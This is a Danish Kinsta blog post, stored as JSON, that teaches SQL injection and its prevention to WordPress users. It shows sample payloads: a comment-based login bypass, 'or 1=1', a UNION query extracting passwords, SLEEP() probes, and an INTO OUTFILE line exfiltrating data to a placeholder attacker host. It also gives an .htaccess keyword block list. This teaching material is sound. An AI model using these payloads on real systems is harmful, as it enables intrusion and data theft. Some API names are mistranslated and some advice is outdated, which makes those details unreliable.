{"id":35684,"date":"2020-01-22T02:06:33","date_gmt":"2020-01-22T01:06:33","guid":{"rendered":"https:\/\/kinsta.com\/?p=62827"},"modified":"2023-08-24T13:46:27","modified_gmt":"2023-08-24T12:46:27","slug":"sql-injection","status":"publish","type":"post","link":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/","title":{"rendered":"SQL Injection: En Begyndervejledning til WordPress-brugere"},"content":{"rendered":"<p>SQL (Structured Query Language) er et sprog, der giver os mulighed for at interagere med <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-databasen\/\">databaser<\/a>. Moderne webapplikationer bruger databaser til at administrere data og vise dynamisk indhold til l\u00e6sere.<\/p>\n<p>SQL-injection eller SQLi er et angreb p\u00e5 en webapplikation der kan kompromittere dens database gennem ondsindede SQL-s\u00e6tninger.<\/p>\n<p>Da det er et almindeligt angreb, s\u00e5 lad os pr\u00f8ve at l\u00e6re mere om, hvad det er, hvordan det sker og hvordan man kan forsvare sig mod det.<\/p>\n<p>Parat? Lad os dykke ned!<\/p>\n<div><\/div><kinsta-auto-toc heading=\"Table of Contents\" exclude=\"last\" list-style=\"arrow\" selector=\"h2\" count-number=\"-1\"><\/kinsta-auto-toc>\n<h2>Hvad er SQL-injection?<\/h2>\n<p>SQL-injection, eller SQLi, er en type angreb p\u00e5 en webapplikation, der g\u00f8r det muligt for en angriber at inds\u00e6tte ondsindede SQL-udsagn i webapplikationen, potentielt for at f\u00e5 adgang til f\u00f8lsomme data i databasen eller \u00f8del\u00e6gge disse data. SQL-injection blev f\u00f8rst opdaget af Jeff Forristal i 1998.<\/p>\n<p>I de to \u00e5rtier siden dens opdagelse har SQL-injection konsekvent v\u00e6ret h\u00f8jt prioriteret hos <a href=\"https:\/\/kinsta.com\/blog\/hire-wordpress-developer\/\">webudviklere<\/a>, n\u00e5r de designer applikationer.<\/p>\n<p>Barclaycard estimerede i 2012, at <a href=\"https:\/\/www.techworld.com\/news\/security\/barclays-97-percent-of-data-breaches-still-due-sql-injection-3331283\/\">97% af dataovertr\u00e6delser indleder med et SQL-injectionsangreb<\/a>. En SQL-injection er udbredt selv i dag, og sv\u00e6rhedsgraden af \u200b\u200binjectionsangreb i en webapplikation anerkendes vidt. Det er en af \u200b\u200bde <a href=\"https:\/\/www.owasp.org\/images\/7\/72\/OWASP_Top_10-2017_%2528en%2529.pdf.pdf\">ti mest kritiske sikkerhedsrisici for webapplikatione<\/a>r af OWASP.<\/p>\n<h2>Hvordan Fungerer SQL-injection s\u00e5rbarheden?<\/h2>\n<p>En SQL-injection s\u00e5rbarhed giver en angriber fuld adgang til din applikations database ved hj\u00e6lp af ondsindede SQL-s\u00e6tninger.<\/p>\n<p>I dette afsnit deler vi et eksempel p\u00e5, hvordan en s\u00e5rbar applikation ser ud.<\/p>\n<p>Forestil dig arbejdsgangen til en typisk webapplikation, der involverer databaseanmodninger gennem brugerindgange. Du f\u00f8rer brugerinput gennem en formular, lad os sige en <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-login-url\/\">loginformular<\/a>. Derefter foresp\u00f8rges din database med de felter, der er indsendt af brugeren for at godkende dem. Strukturen af \u200b\u200bforesp\u00f8rgslen til din database er s\u00e5dan noget som dette:<\/p>\n<pre><code class=\"language-sql\">select * from user_table\nwhere\u00a0username = 'sdaityari'\nand\u00a0password = 'mypassword';\n<\/code><\/pre>\n<p>Lad os antage, at du gemmer dine adgangskoder som klar tekst for at g\u00f8re det lettere. Det er dog en god praksis at <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-salts\/\">salte dine passwords<\/a> og derefter lave hashing p\u00e5 dem. Hvis du g\u00e5r videre, hvis du har modtaget brugernavn og adgangskode fra formularen, kan du definere foresp\u00f8rgslen i PHP som f\u00f8lger:<\/p>\n<pre><code class=\"language-php\">\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query\n<\/code><\/pre>\n<p>Hvis nogen indtaster v\u00e6rdien &#8220;admin&#8221;;-&#8220;i brugernavnfeltet, vil den resulterende SQL-foresp\u00f8rgsel, som variablen $db_query genererer, v\u00e6re som f\u00f8lger:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin';--' and password = 'mypassword'\n<\/code><\/pre>\n<p>Hvad g\u00f8r denne foresp\u00f8rgsel?<\/p>\n<p>En kommentar i SQL starter med dobbelt streger (-). Den resulterende foresp\u00f8rgsel filtrerer kun efter brugernavnet uden at tage hensyn til adgangskoden. Hvis der ikke var nogen sikkerhed p\u00e5 plads for at undg\u00e5 dette, ville du simpelthen f\u00e5 administrativ adgang til webapplikationen bare ved at bruge dette trick.<\/p>\n<p>Alternativt kan et boolesk angreb ogs\u00e5 bruges i dette eksempel til at f\u00e5 adgang. Hvis en angriber angiver &#8220;adgangskode&#8221; eller 1=1; &#8211; &#8220;i adgangskodefeltet, vil den resulterende foresp\u00f8rgsel v\u00e6re som f\u00f8lger:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';\n<\/code><\/pre>\n<p>I dette tilf\u00e6lde, selvom din adgangskode er forkert, vil du blive godkendt til applikationen. Hvis din webside viser resultaterne af databaseforesp\u00f8rgslen, kan en hacker bruge kommandoshowtabellerne, kommando til at vise tabellerne i databasen og derefter selektivt droppe tabeller, hvis de \u00f8nsker det.<\/p>\n<figure style=\"width: 666px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2019\/11\/tegneserie-sql-injection.png\" alt=\"En tegneserie om SQL-injection\" width=\"666\" height=\"205\"><figcaption class=\"wp-caption-text\">En tegneserie om SQL-injection (billedekilde: <a href=\"https:\/\/xkcd.com\/327\/\">XKCD<\/a>)<\/figcaption><\/figure>\n<p>Exploits of a Mom, en popul\u00e6r tegneserie af XKCD, viser samtalen med en mor med sin s\u00f8ns skole, hvor hun bliver spurgt, om hun virkelig kaldte sin s\u00f8n &#8220;Robert\u2019); DROP TABEL Students; -\u201d.<\/p>\n<h2>Typer af SQL-injection<\/h2>\n<p>Nu hvor du kender det grundl\u00e6ggende ved en SQL-injectionss\u00e5rbarhed, lad os unders\u00f8ge de forskellige typer SQL-injectionsangreb og \u00e5rsagen bag hver af dem.<\/p>\n<h3>In-Band SQL-injection<\/h3>\n<p>In-Band SQL-injection er den enkleste form for SQL-injection. I denne proces er angriberen i stand til at bruge den samme kanal til at inds\u00e6tte den ondsindede SQL-kode i applikationen samt indsamle resultaterne. Vi vil diskutere to former for in-band SQL-injectionsangreb:<\/p>\n<h4>Error Based Attack<\/h4>\n<p>En angriber bruger en error based SQL-injectionsteknik i de indledende faser af deres angreb. Ideen bag en error based SQL-injection er at f\u00e5 yderligere oplysninger om databasestrukturen og error based, som webapplikationen f\u00f8lger. For eksempel kan en fejlmeddelelse indeholde error based inkluderet i tabellens foresp\u00f8rgsel og kolonne. Disse data kan derefter bruges til at oprette nye angreb.<\/p>\n<h4>Union-based Angreb<\/h4>\n<p>I denne metode deltager en angriber, der bruger SQL union til at vise resultaterne fra en anden tabel. Hvis en angriber f.eks. er p\u00e5 en <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-search\/\">s\u00f8geside<\/a>, kan de muligvis tilf\u00f8je resultaterne fra en anden tabel.<\/p>\n<pre><code class=\"language-sql\">select title, link from post_table\nwhere id &lt; 10\nunion\nselect username, password\nfrom user_table; --;\n<\/code><\/pre>\n<h3>Inferential SQL-injection (Blind SQL-injection)<\/h3>\n<p>Selv hvis en hacker genererer en fejl i SQL-foresp\u00f8rgslen, sendes svaret p\u00e5 foresp\u00f8rgslen muligvis ikke direkte til websiden. I et s\u00e5dant tilf\u00e6lde skal angriberen unders\u00f8ge yderligere.<\/p>\n<p>I denne form for SQL-injection sender angriberen forskellige foresp\u00f8rgsler til databasen for at vurdere, hvordan applikationen analyserer disse svar. En inferential SQL-injection er undertiden ogs\u00e5 kendt som <strong>blind SQL-injection<\/strong>. Vi vil se p\u00e5 to slags inferentielle SQL-injections nedenfor: boolsk SQL-injection og tidsbaseret SQL-injection.<\/p>\n<h4>Boolean Attack<\/h4>\n<p>Hvis en SQL-foresp\u00f8rgsel resulterer i en fejl, der ikke er blevet h\u00e5ndteret internt i applikationen, kan den resulterende webside muligvis kaste en fejl, indl\u00e6se en tom side eller indl\u00e6se delvist. I en boolean SQL-injection vurderer en angriber, hvilke dele af en brugers input er s\u00e5rbare over for SQL-injectios ved at pr\u00f8ve to forskellige versioner af en boolean clause gennem input:<\/p>\n<ul>\n<li>&#8220;\u2026 and 1=1&#8221;<\/li>\n<li>&#8220;\u2026 and 1=2&#8221;<\/li>\n<\/ul>\n<p>Hvis applikationen fungerer normalt i det f\u00f8rste tilf\u00e6lde, men viser en afvigelse i det andet tilf\u00e6lde, indikerer det, at applikationen er s\u00e5rbar over for et SQL-injection angreb.<\/p>\n<h4>Time-Based Attack<\/h4>\n<p>Et tidsbaseret SQL-injection angreb kan ogs\u00e5 hj\u00e6lpe en angriber med <a href=\"https:\/\/kinsta.com\/docs\/service-information\/disclose-security-vulnerability\/\">at bestemme, om en s\u00e5rbarhed er til stede<\/a> i en webapplikation. En angriber bruger en foruddefineret tidsbaseret funktion af databasestyringssystemet, der bruges af applikationen. <a href=\"https:\/\/kinsta.com\/dk\/blog\/hvad-er-mysql\/\">I MySQL<\/a> instruerer <a href=\"http:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/miscellaneous-functions.html#function_sleep\">function sleep()<\/a> for eksempel databasen til at vente i et bestemt antal sekunder.<\/p>\n<pre><code class=\"language-sql\">select * from comments\nWHERE post_id=1-SLEEP(15);\n<\/code><\/pre>\n<p>Hvis en s\u00e5dan foresp\u00f8rgsel resulterer i en forsinkelse, ville angriberen vide, at den er s\u00e5rbar.<\/p>\n<h3>Out-of-band SQL-injection<\/h3>\n<p>Hvis en angriber ikke er i stand til at samle resultaterne af en SQL-injection gennem den samme kanal. SQL-injection teknikker uden for b\u00e5ndet kan anvendes som et alternativ til inferentielle SQL-injection teknikker.<\/p>\n<p>Disse teknikker involverer typisk afsendelse af data fra databasen til en ondsindet placering efter hackerens valg. Denne proces er ogs\u00e5 meget afh\u00e6ngig af kapaciteten i databasestyringssystemet.<\/p>\n<p>Et SQL-injection angreb uden for b\u00e5ndet bruger en ekstern filproceskapacitet p\u00e5 din DBMS. I MySQL kan funktionerne LOAD_FILE() og INTO OUTFILE bruges til at anmode MySQL om at overf\u00f8re dataene til en ekstern kilde. S\u00e5dan kan en angriber bruge OUTFILE til at sende resultaterne af en foresp\u00f8rgsel til en ekstern kilde:<\/p>\n<pre><code class=\"language-sql\">select * from post_table\ninto OUTFILE '\\\\\\\\MALICIOUS_IP_ADDRESS\\location'\n<\/code><\/pre>\n<p>Tilsvarende kan funktionen LOAD_FILE() bruges til at l\u00e6se en fil fra serveren og vise dens indhold. En kombination af LOAD_FILE() og OUTFILE kan bruges til at l\u00e6se indholdet af en fil p\u00e5 serveren og derefter overf\u00f8re den til et andet sted.<\/p>\n<h2>S\u00e5dan Forhindres SQL-injections<\/h2>\n<p>Indtil videre har vi unders\u00f8gt s\u00e5rbarhederne i en webapplikation, der kan f\u00f8re til SQL-injection angreb. En SQL-injection s\u00e5rbarhed kan bruges af en hacker til at l\u00e6se, \u00e6ndre eller endda fjerne indholdet i din database.<\/p>\n<p>Derudover kan det ogs\u00e5 g\u00f8re det muligt for en at l\u00e6se en fil p\u00e5 ethvert sted p\u00e5 serveren og overf\u00f8re indholdet andetsteds. I dette afsnit udforsker vi forskellige teknikker til at beskytte din webapplikation og websted mod SQL-injection angreb.<\/p>\n<h3>Undslippe User Inputs<\/h3>\n<p>Generelt er det en vanskelig opgave at afg\u00f8re, om en brugerstreng er ondsindet eller ej. Derfor er den bedste m\u00e5de at g\u00f8re det p\u00e5, ved at undslippe specialtegn i brugerinput.<\/p>\n<p>Denne proces sparer dig for et SQL-injection angreb. Du kan undslippe en streng, f\u00f8r du bygger foresp\u00f8rgslen i <a href=\"https:\/\/kinsta.com\/dk\/blog\/er-php-dod\/\">PHP<\/a> ved hj\u00e6lp af funktionen <code>mysql_escape_string() function<\/code>.\u00a0Du kan ogs\u00e5 undslippe en streng i MySQL vha. Funktionen <code>mysqli_real_escape_string()<\/code>.<\/p>\n<p>N\u00e5r du viser output som HTML, skal du ogs\u00e5 konvertere strengen for at sikre dig, at specialtegnene ikke forstyrrer HTML-markeringen. Du kan konvertere specialtegn i PHP vha. Funktionen <code>htmlspecialchars()<\/code>.<\/p>\n<h3>Brug Forberedte Statements<\/h3>\n<p>Alternativt kan du bruge forberedte udsagn for at undg\u00e5 SQL-injection En forberedt erkl\u00e6ring er en skabelon i en SQL-foresp\u00f8rgsel, hvor du specificerer parametre p\u00e5 et senere tidspunkt for at udf\u00f8re det. Her er et eksempel p\u00e5 en forberedt erkl\u00e6ring i PHP og MySQLi.<\/p>\n<pre><code class=\"language-php\">$query = $mysql_connection-&gt;prepare(\"select * from user_table where username = ? and password = ?\");\n$query-&gt;execute(array($username, $password));<\/code><\/pre>\n<h3>Andre Hygiejne Kontroller for at Forhindre SQL-angreb<\/h3>\n<p>Det n\u00e6ste trin i at afb\u00f8de denne s\u00e5rbarhed er at begr\u00e6nse adgangen til databasen til kun det, der er n\u00f8dvendigt.<\/p>\n<p>Forbind f.eks. din webapplikation til DBMS ved hj\u00e6lp af en bestemt bruger, der kun har adgang til den relevante database.<\/p>\n<p>Begr\u00e6ns databasebrugerens adgang til alle andre placeringer p\u00e5 serveren. Du \u00f8nsker muligvis ogs\u00e5 at blokere visse SQL-s\u00f8geord i din URL via din webserver. Hvis du bruger <a href=\"https:\/\/kinsta.com\/dk\/blog\/nginx-vs-apache\/\">Apache<\/a> som en webserver, kan du bruge f\u00f8lgende kodelinjer i din .<a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-htaccess-fil\/\">htaccess-fil<\/a> til at vise en 403 forbidden error til en potentiel hacker.<\/p>\n<p>Du skal v\u00e6re forsigtig, f\u00f8r du bruger denne teknik, da Apache viser en fejl for en l\u00e6ser, hvis URL&#8217;en indeholder disse n\u00f8gleord.<\/p>\n<pre><code>RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta k\u00f8rer WordPress p\u00e5 Nginx-webserveren, som ikke underst\u00f8tter en .htaccess-fil. Hvis du gerne vil oprette en regel til blokering af n\u00f8gleord p\u00e5 din URL, skal du kontakte <a href=\"https:\/\/kinsta.com\/docs\/support\/contact-support\/\">Kinsta supportteam<\/a>, s\u00e5 kan de hj\u00e6lpe.<\/p>\n<\/aside>\n\n<p>Som et ekstra tip til forebyggelse skal du altid bruge <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-hacket\/#2-keep-your-site-updated\">opdateret software<\/a>. N\u00e5r der frigives en ny version eller en patch, beskrives de fejl, der blev rettet i opdateringen, i frig\u00f8relsesnotaterne. N\u00e5r detaljerne om en fejl er ude af offentligheden, kan det at risikere at k\u00f8re en gammel version af enhver software v\u00e6re risikabelt.<\/p>\n<h2>SQL-injection i WordPress<\/h2>\n<p>Du er sikker mod enhver SQL-injection s\u00e5rbarhed, hvis du bruger <a href=\"https:\/\/kinsta.com\/docs\/support\/scope-of-support\/managed-wordpress-scope-of-support\/\">ajourf\u00f8rte WordPress-kernefiler<\/a>. N\u00e5r du bruger <a href=\"https:\/\/kinsta.com\/dk\/blog\/hurtigste-wordpress-temaer\/\">tredjeparts temaer<\/a> og plugins, er hele din applikation imidlertid i fare.<\/p>\n<p><strong>Dit WordPress-websted er kun s\u00e5 st\u00e6rkt som det svageste link<\/strong>. I dette afsnit udforsker vi de vigtigste overvejelser for at afb\u00f8de SQL-injection s\u00e5rbarhed i WordPress og hvordan man udf\u00f8rer s\u00e5rbarhedskontrol p\u00e5 dit eksisterende WordPress-sted.<\/p>\n<h3>SQL-injection Vulnerability Prevention for WordPress<\/h3>\n<p>For at afb\u00f8de s\u00e5rbarheden ved SQL Injection i dit <a href=\"https:\/\/kinsta.com\/dk\/blog\/sadan-installeres-wordpress-tema\/\">WordPress-tema-<\/a> eller plugin er den eneste regel, du skal f\u00f8lge, altid at bruge <a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/\">eksisterende WordPress-funktioner<\/a>, n\u00e5r du interagerer med databasen.<\/p>\n<p>Disse funktioner testes grundigt for SQL-injection s\u00e5rbarheder under WordPress-udviklingsprocessen. Hvis du f.eks. Vil tilf\u00f8je en kommentar til et indl\u00e6g, skal du bruge <a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/wp_insert_comment\/\">funktionen wp_insert_comment()<\/a> i stedet for at inds\u00e6tte data direkte i wp_comments-tabellen.<\/p>\n<p>Mens funktioner er udvides, kan du lejlighedsvis k\u00f8re en kompleks foresp\u00f8rgsel. I et s\u00e5dant tilf\u00e6lde skal du s\u00f8rge for at bruge <a href=\"https:\/\/developer.wordpress.org\/reference\/classes\/wpdb\/\">$wp_db gruppen med funktioner<\/a>. Du kan bruge $wpdb-&gt;forbered() til at undslippe brugerinput, f\u00f8r du opretter foresp\u00f8rgslen.<\/p>\n<p>Derudover er her en <a href=\"https:\/\/developer.wordpress.org\/themes\/theme-security\/data-sanitization-escaping\/\">liste over funktioner, der skal rense data<\/a> i WordPress. Disse hj\u00e6lper dig med at undslippe specifikke typer brugerindgange s\u00e5som e-mails og webadresser.<\/p>\n<h3>Sikre dit WordPress-site<\/h3>\n<p>Mens <a href=\"https:\/\/kinsta.com\/dk\/blog\/er-wordpress-sikker\/\">WordPress i sig selv er sikkert<\/a>, kan problemer s\u00e5som for\u00e6ldet kernesoftware og <a href=\"https:\/\/kinsta.com\/dk\/blog\/nulled-wordpress-plugins-themes\/\">nulled plugins<\/a> f\u00f8re til s\u00e5rbarheder. Selvom der ikke er noget alternativ til dig at kontrollere dit WordPress-sted for SQL-injection s\u00e5rbarhed grundigt, kan kompleksiteten af \u200b\u200bet websted g\u00f8re denne opgave udfordrende.<\/p>\n<p>Du kan bruge et online scanningsv\u00e6rkt\u00f8j som <a href=\"https:\/\/db.threatpress.com\/\">ThreatPass<\/a> og <a href=\"https:\/\/wpscan.org\/\">WPScan<\/a> Sikkerhedsdatabase. Du kan kontrollere dine plugins for at se, om deres udvikling er stoppet. Hvis de blev forladt for et stykke tid tilbage, er det m\u00e5ske ikke en god ide at bruge dem p\u00e5 dit websted.<\/p>\n<p>Hvis du stadig har brug for absolut at bruge dem, skal du s\u00f8rge for at teste deres kode og funktionalitet grundigt til s\u00e5rbarheder. Ud over dette skal du s\u00f8rge for at f\u00f8lge disse hygiejnekontroller:<\/p>\n<ul>\n<li>Opdater PHP, WordPress-kerne og MySQL<\/li>\n<li>Opdater tredjeparts plugins og temaer<\/li>\n<li>Undg\u00e5 at bruge rodbrugeren til at forbinde SQL-databasen<\/li>\n<li>Begr\u00e6ns adgangen til SQL-brugeren til f\u00f8lsomme mapper<\/li>\n<li>Bloker SQL-keywords ved hj\u00e6lp af din server<\/li>\n<li>Hold sikkerhedskopier af dit websted off-site i tilf\u00e6lde af irreversibel skade<\/li>\n<\/ul>\n<p>Her er <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-sikkerhed\/\">et detaljeret indl\u00e6g om WordPress Security<\/a> og en udt\u00f8mmende liste over kontroller. Desuden kan du \u00f8nske at investere i disse <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-sikkerhedsplugins\/\">top sikkerhedsplugins til WordPress<\/a>. Her er hvad du skal g\u00f8re, <a href=\"https:\/\/kinsta.com\/dk\/blog\/wordpress-hacket\/\">hvis dit WordPress-websted er hacket<\/a> p\u00e5 trods af din bedste indsats.<\/p>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta leverer en <a href=\"https:\/\/kinsta.com\/docs\/service-information\/malware-removal\/\">malware sikkerhedsl\u00f8fte<\/a>\u00a0til alle sine kunder p\u00e5 alle planer.<\/p>\n<\/aside>\n\n<h2>Er SQL-injection Ulovligt?<\/h2>\n<p>Helt klart, ja! Selvom der er en faktisk s\u00e5rbarhed, fors\u00f8ger en hacker stadig at f\u00e5 adgang til data, der ellers ikke ville v\u00e6re tilg\u00e6ngelige for dem.<\/p>\n<p>Forestil dig et scenarie, hvor nogen efterlader deres n\u00f8gler i bilen. Vil en k\u00f8rsel v\u00e6k s\u00e5 resultere i en lovovertr\u00e6delse, bare fordi det blev efterladt \u00e5ben og uden opsyn? Handlingen af \u200b\u200bSQLi falder ind under forskellige love i forskellige lande. Det falder ind under <a href=\"https:\/\/www.justice.gov\/sites\/default\/files\/criminal-ccips\/legacy\/2015\/01\/14\/ccmanual.pdf\">Computer Fraud and Abuse Act (1986) in the US<\/a> i USA og <a href=\"http:\/\/www.legislation.gov.uk\/ukpga\/1990\/18\/contents\">Computer Misuse Act (1990) i UK<\/a>.<\/p>\n\n<h2>Resum\u00e9<\/h2>\n<p>SQL-injection s\u00e5rbarheder blev opdaget for l\u00e6nge siden. <a href=\"https:\/\/www.webarxsecurity.com\/website-hacking-statistics-2018-february\/\">En rapport fra 2018 om hacket websteder<\/a> antyder imidlertid, at SQLi er det mest almindelige webstedshack for WordPress efter XSS-angreb. For at forhindre dem i at ske, skal du:<\/p>\n<ul>\n<li>Forst\u00e5, hvordan SQL Injection s\u00e5rbarheden fungerer<\/li>\n<li>Udforsk forskellige m\u00e5der, hvorp\u00e5 angribere kan bruge SQLi til at f\u00e5 uautoriseret adgang til din webapplikation<\/li>\n<li>Implementere metoder til at beskytte dit websted mod SQLi-angreb, s\u00e5som at undslippe brugerindgange og bruge forberedte udsagn<\/li>\n<li>F\u00f8lg en sikkerhetskontrol-rutine<\/li>\n<\/ul>\n<p>Som det gamle ordsprog lyder, &#8220;better safe than sorry&#8221;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQL (Structured Query Language) er et sprog, der giver os mulighed for at interagere med databaser. Moderne webapplikationer bruger databaser til at administrere data og vise &#8230;<\/p>\n","protected":false},"author":118,"featured_media":35687,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kinsta_gated_content":false,"_kinsta_gated_content_redirect":"","footnotes":""},"tags":[188,170],"topic":[754],"class_list":["post-35684","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-sitesecurity","tag-wordpresshack","topic-wordpress-udvikling"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v24.6 (Yoast SEO v24.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SQL Injection: En Begyndervejledning til WordPress-brugere<\/title>\n<meta name=\"description\" content=\"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\" \/>\n<meta property=\"og:locale\" content=\"da_DK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL Injection: En Begyndervejledning til WordPress-brugere\" \/>\n<meta property=\"og:description\" content=\"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\" \/>\n<meta property=\"og:site_name\" content=\"Kinsta\u00ae\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Kinsta-Danmark-122855885298660\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-22T01:06:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-24T12:46:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1460\" \/>\n\t<meta property=\"og:image:height\" content=\"730\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Shaumik Daityari\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:description\" content=\"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\" \/>\n<meta name=\"twitter:creator\" content=\"@kinsta_dk\" \/>\n<meta name=\"twitter:site\" content=\"@kinsta_dk\" \/>\n<meta name=\"twitter:label1\" content=\"Skrevet af\" \/>\n\t<meta name=\"twitter:data1\" content=\"Shaumik Daityari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimeret l\u00e6setid\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutter\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\"},\"author\":{\"name\":\"Shaumik Daityari\",\"@id\":\"https:\/\/kinsta.com\/dk\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\"},\"headline\":\"SQL Injection: En Begyndervejledning til WordPress-brugere\",\"datePublished\":\"2020-01-22T01:06:33+00:00\",\"dateModified\":\"2023-08-24T12:46:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\"},\"wordCount\":2324,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/dk\/#organization\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\",\"keywords\":[\"sitesecurity\",\"wordpresshack\"],\"articleSection\":[\"WordPress Sikkerhed\"],\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\",\"url\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\",\"name\":\"SQL Injection: En Begyndervejledning til WordPress-brugere\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/dk\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\",\"datePublished\":\"2020-01-22T01:06:33+00:00\",\"dateModified\":\"2023-08-24T12:46:27+00:00\",\"description\":\"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.\",\"breadcrumb\":{\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#breadcrumb\"},\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"da-DK\",\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage\",\"url\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\",\"contentUrl\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg\",\"width\":1460,\"height\":730,\"caption\":\"SQL Injection: En Begyndervejledning til WordPress-brugere\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/kinsta.com\/dk\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress udvikling\",\"item\":\"https:\/\/kinsta.com\/dk\/emner\/wordpress-udvikling\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SQL Injection: En Begyndervejledning til WordPress-brugere\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kinsta.com\/dk\/#website\",\"url\":\"https:\/\/kinsta.com\/dk\/\",\"name\":\"Kinsta\u00ae\",\"description\":\"Hurtig, sikker, premium 